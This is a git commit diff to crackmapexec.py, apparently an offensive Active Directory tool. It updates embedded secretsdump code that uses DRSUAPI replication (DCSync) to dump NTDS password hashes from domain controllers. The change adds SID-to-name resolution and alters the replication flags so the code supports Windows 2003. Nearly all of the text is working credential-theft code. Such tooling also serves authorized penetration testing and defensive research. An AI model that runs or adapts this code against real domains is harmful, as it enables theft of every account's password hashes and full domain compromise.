Updated secretsdump.py code for Windows 2003 DC support

2015-08-26 13:44:10 +02:00 · 2015-08-26 13:44:10 +02:00 · dcfa80ba5b
parent 258a76b054
commit dcfa80ba5b
1 changed files with 15 additions and 4 deletions
--- a/crackmapexec.py
+++ b/crackmapexec.py
@ -621,10 +621,10 @@ class RemoteOperations:

        request['pmsgIn']['V8']['pUpToDateVecDest'] = NULL

-        request['pmsgIn']['V8']['ulFlags'] =  drsuapi.DRS_INIT_SYNC | drsuapi.DRS_PER_SYNC
+        request['pmsgIn']['V8']['ulFlags'] =  drsuapi.DRS_INIT_SYNC | drsuapi.DRS_WRIT_REP
        request['pmsgIn']['V8']['cMaxObjects'] = 1
        request['pmsgIn']['V8']['cMaxBytes'] = 0
-        request['pmsgIn']['V8']['ulExtendedOp'] = drsuapi.EXOP_REPL_OBJ | drsuapi.EXOP_REPL_SECRETS
+        request['pmsgIn']['V8']['ulExtendedOp'] = drsuapi.EXOP_REPL_OBJ
        request['pmsgIn']['V8']['pPartialAttrSet'] = NULL
        request['pmsgIn']['V8']['pPartialAttrSetEx1'] = NULL
        request['pmsgIn']['V8']['PrefixTableDest']['pPrefixEntry'] = NULL
@ -648,6 +648,12 @@ class RemoteOperations:
            resp = e.get_packet()
        return resp

+    def ridToSid(self, rid):
+        if self.__samr is None:
+            self.connectSamr(self.getMachineNameAndDomain()[1])
+        resp = samr.hSamrRidToSid(self.__samr, self.__domainHandle , rid)
+        return resp['Sid']
+
    def getMachineNameAndDomain(self):
        if self.__smbConnection.getServerName() == '':
            # No serverName.. this is either because we're doing Kerberos
@ -1402,8 +1408,13 @@ class NTDSHashes:
                for user in resp['Buffer']['Buffer']:
                    userName = user['Name']

-                    # Let's crack the user name into DS_FQDN_1779_NAME
-                    crackedName = self.__remoteOps.DRSCrackNames(drsuapi.DS_NT4_ACCOUNT_NAME_SANS_DOMAIN, name = userName)
+                    userSid = self.__remoteOps.ridToSid(user['RelativeId'])
+
+                    # Let's crack the user sid into DS_FQDN_1779_NAME
+                    # In theory I shouldn't need to crack the sid. Instead
+                    # I could use it when calling DRSGetNCChanges inside the DSNAME parameter.
+                    # For some reason tho, I get ERROR_DS_DRA_BAD_DN when doing so.
+                    crackedName = self.__remoteOps.DRSCrackNames(drsuapi.DS_NAME_FORMAT.DS_SID_OR_SID_HISTORY_NAME, drsuapi.DS_NAME_FORMAT.DS_FQDN_1779_NAME, name = userSid.formatCanonical())

                    if crackedName['pmsgOut']['V1']['pResult']['cItems'] == 1:
                        userRecord = self.__remoteOps.DRSGetNCChanges(crackedName['pmsgOut']['V1']['pResult']['rItems'][0]['pName'][:-1])